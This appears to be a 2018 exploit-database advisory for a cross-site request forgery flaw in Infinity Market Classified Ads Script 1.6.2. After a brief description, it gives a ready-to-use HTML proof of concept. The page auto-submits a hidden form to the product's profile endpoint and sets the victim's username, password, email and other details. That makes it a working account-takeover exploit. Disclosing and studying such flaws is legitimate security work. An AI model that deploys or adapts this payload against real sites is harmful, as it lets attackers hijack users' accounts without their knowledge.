Infinity Market Classified Ads Script 1.6.2 Cross Site Request Forgery

Infinity Market Classified Ads Script version 1.6.2 suffers from a cross site request forgery vulnerability.


MD5 | bd90cdb52547245a61c4cbdb0d6e87ee

# Exploit Title:  Infinity Market Classified Ads Script 1.6.2 - Cross-Site Request Forgery
# Date: 2018-05-18
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/classifieds-multipurpose-portal-infinity-market/16572285?s_rank=1520
# Version: 1.6.2
# Tested on: Kali linux

# Description : CSRF vulnerability allows attacker to change user's information directly .

# POC :

<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://geniuscript.com/classified/index.php/frontend/myprofile/en" method="POST">
<input type="hidden" name="name_surname" value="decode" />
<input type="hidden" name="username" value="user" />
<input type="hidden" name="password" value="anything" />
<input type="hidden" name="password_confirm" value="anything" />
<input type="hidden" name="address" value="Cyro trento 23" />
<input type="hidden" name="description" value="My description 2" />
<input type="hidden" name="phone" value="+10000000" />
<input type="hidden" name="mail" value="s[email protected]" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

Related Posts